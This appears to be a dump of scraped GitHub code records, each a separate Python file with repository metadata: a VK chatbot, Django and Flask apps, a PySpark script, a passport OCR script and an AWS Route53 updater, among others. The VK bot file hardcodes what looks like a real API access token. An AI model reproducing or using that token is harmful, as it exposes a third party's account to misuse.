  >>> popcount(0b1101111010101101)\r\n    11\r\n    
\"\"\"\r\n return bin(x).count('1')","repo_name":"80Ltrumpet/me2-decision-tree","sub_path":"me2/bits.py","file_name":"bits.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10544870423","text":"#!/usr/bin/env python3.6\nimport requests\nimport sqlite3\nimport uuid\n\nACCESS_TOKEN = \"e4457ff3d3353f9faccbcaaca9d17d172bf926cf15c9657b336c7c46ecb65b69c3674755905e0335b6d6d\"\nBOT_ID = \"c4617d9d-f7d4-4410-a555-e23635ce2ceb\"\nGROUP_ID = \"49743066\"\n\nconn = sqlite3.connect('sessions.db')\ncur = conn.cursor()\nlongpoll = {}\n\ncur.execute('''CREATE TABLE IF NOT EXISTS sessions\n (vkid text, ssid text)''')\n\n\ndef new_longpoll():\n\treqparam = {\n\t\t'access_token': ACCESS_TOKEN,\n\t\t'v': '5.80',\n\t\t'group_id': GROUP_ID\n\t}\n\tr = requests.get('https://api.vk.com/method/groups.getLongPollServer',\n\t\t\t\t\t params=reqparam)\n\tprint(r.text)\n\tlongpoll.update(r.json().get('response', {}))\n\tprint('LongPoll was obtained')\n\n\ndef perform_answer(m):\n\tt = (m['from_id'],)\n\tsession = cur.execute('''SELECT * FROM sessions\n WHERE vkid=?''', t)\n\tsres = session.fetchone()\n\tif not sres:\n\t\tssid = uuid.uuid4()\n\t\tp = (m['from_id'], str(ssid.int))\n\t\tcur.execute('INSERT INTO sessions VALUES (?, ?)', p)\n\t\tconn.commit()\n\telse:\n\t\tssid = sres[1]\n\treqparam = {\n\t\t'q': m['text'],\n\t\t'sessionId': ssid\n\t}\n\tr = requests.get('https://console.dialogflow.com/api-client/demo/embedded/%s/demoQuery' % BOT_ID,\n\t\t\t\t\t params=reqparam)\n\tres = r.json()['result']['fulfillment']['speech']\n\treturn res\n\n\ndef send(to, text, reqMessage ):\n\treqparam = {\n\t\t'access_token': ACCESS_TOKEN,\n\t\t'v': '5.80',\n\t\t'user_id': to,\n\t\t'message': text\n\t}\n\tr = requests.get('https://api.vk.com/method/messages.send', params=reqparam)\n\tif r.status_code >= 400:\n\t\treqparam[\"message\"] = f\"Что-то пошло не так при обмене сообщениями между ВК и нашей базой ответов :(\\n\" \\\n\t\t\t\t\t\t\t f\"Ошибка: {r.reason}\"\n\t\trequests.get('https://api.vk.com/method/messages.send', params=reqparam)\n\t\topen(\"errorLog.txt\", \"w\").write(f\"{reqMessage}\\n==> {r.reason}\")\n\treturn 'response' in r.json()\n\n\ndef startListening():\n\twhile True:\n\t\treqparam = {\n\t\t\t'act': 'a_check',\n\t\t\t'key': longpoll['key'],\n\t\t\t'ts': longpoll['ts'],\n\t\t\t'wait': '25'\n\t\t}\n\t\tr = requests.get(longpoll['server'], params=reqparam)\n\t\tres = r.json()\n\t\tif 'failed' in res:\n\t\t\tif res['failed'] == 1:\n\t\t\t\tlongpoll['ts'] = res['ts']\n\t\t\t\tcontinue\n\t\t\telif res['failed'] == 2 or res['failed'] == 3:\n\t\t\t\tnew_longpoll()\n\t\t\t\tcontinue\n\t\tlongpoll['ts'] = res['ts']\n\t\tfor upd in res['updates']:\n\t\t\tif upd['type'] == 'message_new':\n\t\t\t\tmsg = upd['object']\n\t\t\t\tif msg['from_id'] == '-%s' % BOT_ID:\n\t\t\t\t\tcontinue\n\t\t\t\ttext_res = perform_answer(msg)\n\t\t\t\tprint('Request: %s' % msg[\"text\"])\n\t\t\t\tsend(msg['from_id'], text_res, msg[\"text\"])\n\t\t\t\tprint('Response: %s' % text_res)\n\t\t\t\tprint('==========')\n\n\nif __name__ == '__main__':\n\twhile True:\n\t\ttry:\n\t\t\tnew_longpoll()\n\t\t\tstartListening()\n\t\texcept Exception as e:\n\t\t\topen(\"exceptionLog.txt\", 'w').write(str(e.args))\n","repo_name":"IAlmostDeveloper/student-practice-bot","sub_path":"PyBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"32852682481","text":"from datetime import timedelta, datetime\nimport dateutil\nfrom django.core.cache import cache\nfrom django.core.urlresolvers import reverse\nimport operator\nimport pytz\nfrom casexml.apps.case.models import CommCareCaseGroup\nfrom corehq.apps.groups.models import Group\nfrom corehq.apps.reports import util\nfrom corehq.apps.reports.dispatcher import ProjectReportDispatcher, CustomProjectReportDispatcher\nfrom corehq.apps.reports.exceptions import BadRequestError\nfrom corehq.apps.reports.fields import FilterUsersField\nfrom corehq.apps.reports.generic import GenericReportView\nfrom corehq.apps.reports.models import HQUserType\nfrom corehq.apps.reports.filters.select import MonthFilter, YearFilter\nfrom corehq.apps.users.models import CommCareUser\nfrom dimagi.utils.dates import DateSpan\nfrom django.utils.translation import ugettext_noop\nfrom dimagi.utils.decorators.memoized import memoized\n\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass ProjectReport(GenericReportView):\n # overriding properties from GenericReportView\n section_name = ugettext_noop(\"Project Reports\")\n base_template = 'reports/base_template.html'\n dispatcher = ProjectReportDispatcher\n asynchronous = True\n\n @property\n def default_report_url(self):\n return reverse('reports_home', args=[self.request.project])\n\n def set_announcements(self):\n if self.request.couch_user:\n util.set_report_announcements_for_user(self.request, self.request.couch_user)\n\n\nclass CustomProjectReport(ProjectReport):\n dispatcher = CustomProjectReportDispatcher\n emailable = True\n\nclass CommCareUserMemoizer(object):\n\n @memoized\n def by_domain(self, domain, is_active=True):\n users = CommCareUser.by_domain(domain, is_active=is_active)\n for user in users:\n # put users in the cache for get_by_user_id\n # so that function never has to touch the database\n self.get_by_user_id.get_cache(self)[(self, user.user_id)] = user\n return users\n\n @memoized\n def get_by_user_id(self, user_id):\n return CommCareUser.get_by_user_id(user_id)\n\nclass ProjectReportParametersMixin(object):\n \"\"\"\n All the parameters necessary for the project reports.\n Intended to be mixed in with a GenericReportView object.\n\n \"\"\"\n\n default_case_type = None\n filter_group_name = None\n filter_users_field_class = FilterUsersField\n include_inactive = False\n\n # set this to set the report's user ids from within the report\n # (i.e. 
based on a filter's return value).\n override_user_ids = None\n need_group_ids = False\n\n @property\n @memoized\n def CommCareUser(self):\n return CommCareUserMemoizer()\n\n @memoized\n def get_all_users_by_domain(self, group=None, user_ids=None, user_filter=None, simplified=False):\n return list(util.get_all_users_by_domain(\n domain=self.domain,\n group=group,\n user_ids=user_ids,\n user_filter=user_filter,\n simplified=simplified,\n CommCareUser=self.CommCareUser\n ))\n\n @property\n @memoized\n def user_filter(self):\n return self.filter_users_field_class.get_user_filter(self.request)[0]\n\n @property\n @memoized\n def default_user_filter(self):\n return self.filter_users_field_class.get_user_filter(None)[0]\n\n @property\n def group_id(self):\n return self.group_ids[0] if len(self.group_ids) else ''\n\n @property\n @memoized\n def group(self):\n if self.group_id and self.group_id != '_all':\n return Group.get(self.group_id)\n else:\n return self.groups[0] if len(self.groups) else None\n\n @property\n def group_ids(self):\n return filter(None, self.request.GET.getlist('group'))\n\n @property\n @memoized\n def groups(self):\n from corehq.apps.groups.models import Group\n if '_all' in self.group_ids or self.request.GET.get('all_groups', 'off') == 'on':\n return Group.get_reporting_groups(self.domain)\n return [Group.get(g) for g in self.group_ids]\n\n @property\n def individual(self):\n \"\"\"\n todo: remember this: if self.individual and self.users:\n self.name = \"%s for %s\" % (self.name, self.users[0].get('raw_username'))\n \"\"\"\n return self.request_params.get('individual', '')\n\n @property\n def mobile_worker_ids(self):\n ids = self.request.GET.getlist('select_mw')\n if '_all' in ids or self.request.GET.get('all_mws', 'off') == 'on':\n cache_str = \"mw_ids:%s\" % self.domain\n ids = cache.get(cache_str)\n if not ids:\n cc_users = CommCareUser.by_domain(self.domain)\n if self.include_inactive:\n cc_users += CommCareUser.by_domain(self.domain, is_active=False)\n ids = [ccu._id for ccu in cc_users]\n cache.set(cache_str, ids, 24*60*60)\n return ids\n\n @property\n @memoized\n def users(self):\n if self.filter_group_name and not (self.group_id or self.individual):\n group = Group.by_name(self.domain, self.filter_group_name)\n else:\n group = self.group\n\n if self.override_user_ids is not None:\n user_ids = self.override_user_ids\n else:\n user_ids = [self.individual]\n\n return self.get_all_users_by_domain(\n group=group,\n user_ids=tuple(user_ids),\n user_filter=tuple(self.user_filter),\n simplified=True\n )\n\n @property\n @memoized\n def user_ids(self):\n return [user.get('user_id') for user in self.users]\n\n _usernames = None\n @property\n @memoized\n def usernames(self):\n return dict([(user.get('user_id'), user.get('username_in_report')) for user in self.users])\n\n @property\n @memoized\n def users_by_group(self):\n user_dict = {}\n for group in self.groups:\n user_dict[\"%s|%s\" % (group.name, group._id)] = self.get_all_users_by_domain(\n group=group,\n user_filter=tuple(self.default_user_filter),\n simplified=True\n )\n if self.need_group_ids:\n for users in user_dict.values():\n for u in users:\n u[\"group_ids\"] = Group.by_user(u['user_id'], False)\n\n return user_dict\n\n @property\n @memoized\n def users_by_mobile_workers(self):\n from corehq.apps.reports.util import _report_user_dict\n user_dict = {}\n for mw in self.mobile_worker_ids:\n user_dict[mw] = _report_user_dict(CommCareUser.get_by_user_id(mw))\n\n if self.need_group_ids:\n for user in user_dict.values():\n 
user[\"group_ids\"] = Group.by_user(user[\"user_id\"], False)\n\n return user_dict\n\n def get_admins_and_demo_users(self, ufilters=None):\n ufilters = ufilters if ufilters is not None else ['1', '2', '3']\n users = self.get_all_users_by_domain(\n group=None,\n user_filter=tuple(HQUserType.use_filter(ufilters)),\n simplified=True\n ) if ufilters else []\n\n if self.need_group_ids:\n for u in users:\n u[\"group_ids\"] = Group.by_user(u, False)\n return users\n\n @property\n @memoized\n def admins_and_demo_users(self):\n ufilters = [uf for uf in ['1', '2', '3'] if uf in self.request.GET.getlist('ufilter')]\n users = self.get_admins_and_demo_users(ufilters)\n return users\n\n @property\n @memoized\n def admins_and_demo_user_ids(self):\n return [user.get('user_id') for user in self.admins_and_demo_users]\n\n\n @property\n @memoized\n def combined_users(self):\n #todo: replace users with this and make sure it doesn't break existing reports\n all_users = [user for sublist in self.users_by_group.values() for user in sublist]\n all_users.extend([user for user in self.users_by_mobile_workers.values()])\n all_users.extend([user for user in self.admins_and_demo_users])\n return dict([(user['user_id'], user) for user in all_users]).values()\n\n @property\n @memoized\n def combined_user_ids(self):\n return [user.get('user_id') for user in self.combined_users]\n\n @property\n @memoized\n def case_sharing_groups(self):\n return set(reduce(operator.add, [[u['group_ids'] for u in self.combined_users]]))\n\n @property\n def history(self):\n history = self.request_params.get('history', '')\n if history:\n try:\n return dateutil.parser.parse(history)\n except ValueError:\n pass\n\n @property\n def case_type(self):\n return self.default_case_type or self.request_params.get('case_type', '')\n\n @property\n def case_status(self):\n from corehq.apps.reports.fields import SelectOpenCloseField\n return self.request_params.get(SelectOpenCloseField.slug, '')\n\n @property\n def case_group_ids(self):\n return filter(None, self.request.GET.getlist('case_group'))\n\n @property\n @memoized\n def case_groups(self):\n return [CommCareCaseGroup.get(g) for g in self.case_group_ids]\n\n @property\n @memoized\n def cases_by_case_group(self):\n case_ids = []\n for group in self.case_groups:\n case_ids.extend(group.cases)\n return case_ids\n\n\n\nclass CouchCachedReportMixin(object):\n \"\"\"\n Use this mixin for caching reports as objects in couch.\n \"\"\"\n _cached_report = None\n @property\n def cached_report(self):\n if not self._cached_report:\n self._cached_report = self.fetch_cached_report()\n return self._cached_report\n\n def fetch_cached_report(self):\n \"\"\"\n Here's where you generate your cached report.\n \"\"\"\n raise NotImplementedError\n\n\nclass DatespanMixin(object):\n \"\"\"\n Use this where you'd like to include the datespan field.\n \"\"\"\n datespan_field = 'corehq.apps.reports.filters.dates.DatespanFilter'\n datespan_default_days = 7\n inclusive = True\n\n _datespan = None\n @property\n def datespan(self):\n if self._datespan is None:\n datespan = self.default_datespan\n if self.request.datespan.is_valid() and not self.request.datespan.is_default:\n datespan.enddate = self.request.datespan.enddate\n datespan.startdate = self.request.datespan.startdate\n datespan.is_default = False\n elif self.request.datespan.get_validation_reason() == \"You can't use dates earlier than the year 1900\":\n raise BadRequestError()\n self.request.datespan = datespan\n # todo: don't update self.context here. 
find a better place! AGH! Sorry, sorry.\n self.context.update(dict(datespan=datespan))\n self._datespan = datespan\n return self._datespan\n\n @property\n def default_datespan(self):\n datespan = DateSpan.since(self.datespan_default_days, timezone=self.timezone, inclusive=self.inclusive)\n datespan.is_default = True\n return datespan\n\n\nclass MonthYearMixin(object):\n \"\"\"\n Similar to DatespanMixin, but works with MonthField and YearField\n \"\"\"\n fields = [MonthFilter, YearFilter]\n\n _datespan = None\n @property\n def datespan(self):\n if self._datespan is None:\n datespan = DateSpan.from_month(self.month, self.year)\n self.request.datespan = datespan\n self.context.update(dict(datespan=datespan))\n self._datespan = datespan\n return self._datespan\n\n @property\n def month(self):\n if 'month' in self.request_params:\n return int(self.request_params['month'])\n else:\n return datetime.now().month\n\n @property\n def year(self):\n if 'year' in self.request_params:\n return int(self.request_params['year'])\n else:\n return datetime.now().year\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/reports/standard/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14246977544","text":"from pyspark.sql import *\nfrom pyspark.sql.functions import *\n\nspark = SparkSession.builder.master(\"local[*]\").appName(\"test\").getOrCreate()\nsc = spark.sparkContext\ndata=\"D:\\\\bigdata\\\\datasets\\\\10000Records.csv\"\ndf=spark.read.format(\"csv\").option(\"header\",\"true\").option(\"sep\",\",\").option(\"inferSchema\",\"true\").load(data)\n#inferSchema .... when ur readdding data auto convert data to appropriate datatypes means value 4444 converet to int .. 4343.4 convert to double\nimport re\nnum = int(df.count())\ncols=[re.sub('[^a-zA-Z0-9]',\"\",c.lower()) for c in df.columns]\n# re .. replace .. except all Small letters, capital letters and number except those any other symbols if u have replace/remove\n\nndf =df.toDF(*cols)\n#toDF used to rename all cloumns , and convert rdd to dataframe ... 
at that time use toDF\n\nndf.show(21,truncate=True)\n#by default the show method displays the top 20 rows, and any field longer than 20 chars is truncated with ...\nndf.printSchema()\n#displays the dataframe column names and their datatypes","repo_name":"ganu1111/pythonProject3","sub_path":"complexcsv.py","file_name":"complexcsv.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15955076349","text":"import os\nimport sys\nimport tempfile\nimport re\nfrom django.core.handlers.wsgi import WSGIHandler\n\ndef getEnvironmentFromSourceMe(thisDir):\n    # pick up environment variables from sourceme\n    fd, tmp = tempfile.mkstemp('djangoWsgiSourceMe.txt')\n    os.close(fd)\n    os.system('bash -c \"(source %s/sourceme.sh && printenv > %s)\"' % (thisDir, tmp))\n    varsIn = file(tmp, 'r')\n    for line in varsIn:\n        line = line[:-1] # chop final cr\n        var, val = line.split('=', 1)\n        os.environ[var] = val\n    varsIn.close()\n    try:\n        os.unlink(tmp)\n    except:\n        pass\n\n    # add any new entries from PYTHONPATH to Python's sys.path\n    if os.environ.has_key('PYTHONPATH'):\n        envPath = re.sub(':$', '', os.environ['PYTHONPATH'])\n        sys.path = envPath.split(':') + sys.path\n\ndef sendError(start_response, text):\n    start_response(text, [('Content-type', 'text/html')])\n    return [\"\"\"\n<html>\n  <head><title>%s</title></head>\n  <body>\n    <h1>%s</h1>\n  </body>\n</html>
    \n\n \"\"\" % (text, text)]\n\ndef downForMaintenance(environ, start_response):\n import stat\n import time\n thisDir = os.path.dirname(os.path.realpath(__file__))\n downFile = os.path.join(thisDir, 'DOWN_FOR_MAINTENANCE')\n downMtime = os.stat(downFile)[stat.ST_MTIME]\n downTimeString = time.strftime('%Y-%m-%d %H:%M %Z', time.localtime(downMtime))\n return sendError(start_response, '503 Down for maintenance since %s' % downTimeString)\n\nthisDir = os.path.dirname(os.path.realpath(__file__))\ngetEnvironmentFromSourceMe(thisDir)\nif os.path.exists(os.path.join(thisDir, 'DOWN_FOR_MAINTENANCE')):\n application = downForMaintenance\nelse:\n application = WSGIHandler()\n","repo_name":"trey0/geocamShare","sub_path":"djangoWsgi.py","file_name":"djangoWsgi.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"26374990495","text":"### the following function finds the highest perfect square which is below the input value \r\n\r\ndef HighestPerfectSQ(inputValue):\r\n\r\n### the loop iterates until the NexthighestSQ goes over the input value at which stage we take the previous highest square\r\n highestSQ=1\r\n NexthighestSQ=4\r\n index=1\r\n while NexthighestSQ<=inputValue:\r\n highestSQ=index**2\r\n index=index+1\r\n NexthighestSQ=index**2\r\n print(highestSQ)\r\n","repo_name":"NamarEXE/210CT","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30697185482","text":"from partitions.registry import registry\n\n\ndef chop(queryset, by):\n app_model = \"%s.%s\" % (\n queryset.model._meta.app_label,\n queryset.model._meta.object_name\n )\n expression = registry.expression_for(by, app_model)\n return queryset.filter(expression) if expression is not None else queryset\n","repo_name":"eldarion/django-partitions","sub_path":"partitions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"35249163218","text":"from flask import Flask, render_template, request\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nimport service\nfrom service.model import SkillSet, Skills\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n quests = service.get_quest_data()\n return render_template('index.html', quests=quests, skills=Skills)\n\n\ndef parse_initial_stats(form_data: ImmutableMultiDict[str, str]):\n result = SkillSet()\n\n for skill in result:\n type = form_data.get(f'skill{str(skill)}Type', None)\n value = form_data.get(f'skill{str(skill)}Value', '0')\n value = int(value) if value else 0\n if type == 'level':\n value = Skills.min_xp_for_level(int(value))\n result[skill] = max(result[skill], value)\n\n return result\n\n\n@app.route('/result', methods=['POST'])\ndef result():\n initial_stats = parse_initial_stats(request.form)\n completed_quests = [int(quest_id) for form_name, quest_id in request.form.items() if form_name.startswith('quest_')]\n strategy = service.get_optimal_quest_strategy(initial_quests=completed_quests, initial_stats=initial_stats)\n return render_template('result.html', strategy=strategy)\n","repo_name":"xurdones/RsOptimalQuestOrder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} 
+{"seq_id":"20077627863","text":"# import json\n# res=json.loads(response)\n# print(res['responses'][0]['textAnnotations'][1]['boundingPoly']['vertices'])\n\nimport os.path\nimport json\nimport nltk\nimport extrac_field_content\nimport conecte_to_ocr\n\n\ndef Similarity(var, fields=['Passpord Card no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth',\n 'Place of Birth']):\n min = len(var) / 3\n fieldMin = ' '\n for field in fields:\n if nltk.edit_distance(field, var) <= min or field.__contains__(var):\n min = nltk.edit_distance(field, var)\n fieldMin = field\n return fieldMin\n\n\ndef call_google_ocr_api(id_image_path):\n res = conecte_to_ocr.call_google_ocr_api(id_image_path)\n return res\n\n\ndef getSentenseplace(id_image_path):\n statment = []\n response = call_google_ocr_api(id_image_path)\n # all the fiels togezer\n ###res = json.loads\n res = response\n # print(res['responses'][0]['textAnnotations'][0]['description'])\n # statment = response[0]['textAnnotations'][0]['description'].split('\\n')\n # the array that contains all the details mevulgan\n FILENAME = r'ocrresponse.json'\n f = open(FILENAME, 'w')\n f.write(res)\n f.close()\n res = json.loads(res)\n # print(res['responses'][0]['textAnnotations'][0]['description'])\n # print(res['textAnnotations'][0]['description'])\n # print()\n statment = json.dumps(res['textAnnotations'][0]['description'])\n print(statment)\n # array that contains the fields from the picture\n statment = statment.split(\"\\\\n\")\n print()\n idfieldsplaces = {}\n idfields = {}\n # fields = ['Passpord Card no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth', 'Place of Birth']\n fields = ['Passpord no', 'Nationality', 'Surname', 'Given Names', 'Sex', 'Date of Birth', 'Place of Birth']\n statment[0] = statment[0][1:]\n # !!!!!!!!!check spelling for the data that comes from ocr-esti\n # and organize the word\n sfield = res['textAnnotations']\n sfield = sfield[1:]\n\n indexOfWord = 1\n index = 0\n for s in statment:\n print(s)\n # find the positions in the json filed for every field\n for s in statment:\n cnt = s.count(' ') + 1\n # if s in fields\n currentNameField = Similarity(s.split('/')[0],fields)\n\n if (currentNameField != ' '):\n if cnt > 1:\n currentNameF = s.find(currentNameField)\n if currentNameF > 0:\n indexOfWord += currentNameF-1\n cnt -= currentNameF-1\n idfields[currentNameField] = extrac_field_content.get_filed_value(indexOfWord, res)\n idfieldsplaces[currentNameField] = indexOfWord\n indexOfWord += cnt\n index += 1\n print(\"the fields .........................................................\")\n for key, val in idfieldsplaces.items():\n print(\"{} :{}\".format(key, val), end=\"\\n\")\n print(\"the positions........................................................\")\n for key, val in idfields.items():\n print(\"{} :{}\".format(key, val), end=\"\\n\")\n idfields = json.dumps(idfields)\n print(idfields)\n\n\nif __name__ == \"__main__\":\n getSentenseplace('C:\\\\Users\\\\tichnut\\\\passport.jpg')\n\n","repo_name":"IdetectTeam/IDetect","sub_path":"post/jesonFile.py","file_name":"jesonFile.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"30980735772","text":"'''\nGran the IP addresses of all instances in an autoscaling group\nand update the route53 dns records everytime the IP changes.\n'''\n\nimport boto3\n\n# functin returns list of IP addresses of instances with specific name tag\ndef get_ec2_ip():\n\t# 
connect to ec2\n\tec2 = boto3.resource('ec2')\n\n\t# list to store the results\n\tec2_ip_list = []\n\tec2_info = {}\n\tnewlist = []\n\t# get all instances that are in running state\n\tinstances = ec2.instances.filter(Filters=[{\n\t    'Name': 'instance-state-name',\n\t    'Values': ['running']}])\n\n\tfor instance in instances:\n\t\tfor tag in instance.tags:\n\t\t\tif 'Name' in tag['Key']:\n\t\t\t\tname = tag['Value']\n\n\t\tif name == 'custom_name':\n\t\t\tec2_ip_list.append(instance.private_ip_address)\n\n\treturn ec2_ip_list\n\n\n# function adds IP addresses to route53\ndef create_route53(hosted_zone_id, ec2_ip_autoscaling_list):\n\tdns = boto3.client('route53')\n\n\tzones = dns.get_hosted_zone(Id=hosted_zone_id)\n\t# print(zones)\n\tname = zones['HostedZone']['Name']\n\n\t# random_string = ''.join(random.choice(string.digits) for _ in range(4))\n\tresponse = dns.change_resource_record_sets(\n\t    HostedZoneId=hosted_zone_id,\n\t    ChangeBatch={\n\t        \"Comment\": \"Automatic DNS update of EC2 instances\",\n\t        \"Changes\": [\n\t            {\n\t                \"Action\": \"UPSERT\",\n\t                \"ResourceRecordSet\": {\n\t                    \"Name\": 'udp.'+name,\n\t                    \"Type\": \"A\",\n\t                    # 'SetIdentifier': '9812',\n\t                    # 'Weight': 123,\n\t                    # \"Region\": \"us-east-2\",\n\t                    # 'MultiValueAnswer': True,\n\t                    \"TTL\": 300,\n\t                    \"ResourceRecords\": ec2_ip_autoscaling_list\n\t                }\n\t            }]\n\t    })\n\ndef main():\n\thosted_zone_id = 'insert-zone-id'\n\tec2_ip_autoscaling_list = [] # formatted list to feed to the route53 function\n\tec2_ips = get_ec2_ip() # get the list of IP's\n\tfor ec2_ip in ec2_ips:\n\t\tec2_ip_autoscaling_list.append({'Value': ec2_ip}) # manipulate the list to get a formatted list of dicts to feed to the route53 function\n\tcreate_route53(hosted_zone_id, ec2_ip_autoscaling_list)\n\t\nif __name__ == '__main__':\n\tmain()\n","repo_name":"hsinghmann/aws","sub_path":"autoscaling_route53.py","file_name":"autoscaling_route53.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19652029422","text":"\"\"\"\nTesting/demonstration script for RTCFL with feedforward DNN actors. Performs poorly.\n\nMihir Savadi 2 May 2022\n\"\"\"\n\nfrom pdb import runcall\nfrom lib import *\n\nfrom control_feedback_testbench import base, plants, controllers, circuits, scheduler\n\n\nif __name__ == \"__main__\" :\n\n    # first testing the purely feedforward based NN. 
Garbage performance.\n runObj = scheduler.scheduler(\n type='text',\n source='code/r_inputs/randomStep.csv',\n circuit=circuits.RTCFL_DNN(\n plant_bb = plants.FOPDT(params={'K' : 2.25, 'tau': 60.5, 'theta' : 9.9}),\n plant_nn = plants.DNN(name=\"plant_nn\", \n params={'n' : 500,\n 'hidden layers' : [750, 750],\n 'activation function' : torch.nn.ReLU,\n 'learning rate' : 0.001,\n 'device' : 'cpu'\n }),\n plant_minError = 5,\n plant_k = 1,\n plant_l = 1000,\n controller_nn = controllers.DNN(name=\"plant_nn\", \n params={'n' : 500,\n 'hidden layers' : [750, 750],\n 'activation function' : torch.nn.ReLU,\n 'learning rate' : 0.001,\n 'device' : 'cpu'\n }),\n controller_minLoss = 2000,\n controller_k = 1,\n controller_l = 1000\n )\n )\n # errorMem = [0.0]*500\n # while runObj.update(runAll=False) :\n # error = runObj.getCircuitInfo()['e'][-1]\n # errorMem.pop(0)\n # errorMem.append(error)\n # average = sum(errorMem)/len(errorMem)\n # print(f\"mode: {runObj.getCircuitInfo()['mode'][-1]},\\tr[t] = {runObj.getCircuitInfo()['r'][-1]},\\tu[t] = {round(runObj.getCircuitInfo()['y'][-1], 2)},\\terror = {round(error, 2)},\\taverage error = {round(average, 2)}\")\n\n totalIterations = 10000\n print(f'Running {totalIterations} iterations of the input.')\n for i in tqdm(range(totalIterations)) :\n if runObj.update(runAll=False) == False :\n break\n runObj.genPlot(printPlot=True)","repo_name":"mihirsavadi/control-feedback-testbench","sub_path":"code/test_rtcfl-DNN.py","file_name":"test_rtcfl-DNN.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29128571240","text":"from datetime import date\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.core.validators import validate_email\nfrom django.db.models import Subquery, Avg, Q\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .models import Message, Product, Size, ShoppingCart, Follows, Comment, Likes, BoughtProducts, SellerProduct, Review, FollowsForum\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\n\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, Http404\nfrom django.urls import reverse, reverse_lazy\nfrom .models import Post, Forum, Client, Seller, Country, Team, Sport\nfrom .serializers import PostSerializer, CommentSerializer, UserSerializer, OwnerSerializer\n\nfrom django.contrib.auth import get_user_model\n\n\ndef seller_check(user):\n return Seller.objects.filter(user=user).exists()\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef index(request):\n user_type = None\n is_seller = False # Initialize is_seller as False\n\n if hasattr(request.user, 'client'):\n user_type = 'client'\n elif hasattr(request.user, 'seller'):\n user_type = 'seller'\n is_seller = True\n\n post_list = Post.objects.order_by('-created_at')\n liked_posts = Post.objects.filter(likes__user=request.user)\n product_list = Product.objects.order_by('-created_at')\n\n\n if user_type == 'client':\n User = get_user_model()\n client_user = 
User.objects.get(client=request.user.client)\n followed_forums = FollowsForum.objects.filter(user=client_user)\n\n followed_forums_post = []\n for forum in followed_forums:\n forum_posts = Post.objects.filter(forum=forum.forum)\n followed_forums_post += forum_posts\n else:\n User = get_user_model()\n client_user = User.objects.get(seller=request.user.seller)\n followed_forums = FollowsForum.objects.filter(user=client_user)\n\n followed_forums_post = []\n for forum in followed_forums:\n forum_posts = Post.objects.filter(forum=forum.forum)\n followed_forums_post += forum_posts\n request.session['user_type'] = user_type\n context = {\n 'post_list': post_list,\n 'product_list': product_list,\n 'user': request.user,\n 'is_seller': is_seller,\n 'liked_posts': liked_posts,\n 'followed_forums_post': followed_forums_post,\n }\n\n return render(request, 'sports24h/index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef posts_index(request):\n post_list = Post.objects.order_by('-created_at')\n liked_posts = Post.objects.filter(likes__user=request.user)\n product_list = Product.objects.order_by('-created_at')\n is_seller = Seller.objects.filter(user=request.user).exists()\n context = {\n 'post_list': post_list,\n 'product_list': product_list,\n 'user': request.user,\n 'liked_posts': liked_posts,\n 'is_seller': is_seller\n }\n return render(request, 'sports24h/posts_index.html', context)\n\n\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef products_index(request):\n product_list = Product.objects.order_by('-created_at')\n is_seller = Seller.objects.filter(user=request.user).exists()\n context = {\n 'product_list': product_list,\n 'user': request.user,\n 'is_seller': is_seller\n }\n return render(request, 'sports24h/products_index.html', context)\n\n\n@user_passes_test(seller_check, login_url=reverse_lazy('sports24h:access_denied'))\n@login_required(login_url=reverse_lazy('sports24h:login_user'))\ndef post(request):\n if not request.method == 'POST':\n forum_list = Forum.objects.order_by('-name')\n context = {\n 'forum_list': forum_list,\n }\n return render(request, 'sports24h/create_post.html', context)\n title = request.POST.get('title', '')\n forum = request.POST.get('forum', '')\n text = request.POST.get('text', '')\n s = Seller.objects.get(user=request.user)\n if title and forum and text:\n f = Forum.objects.get(name=forum)\n p = Post(owner=s, forum=f, title=title, text=text)\n p.save()\n return 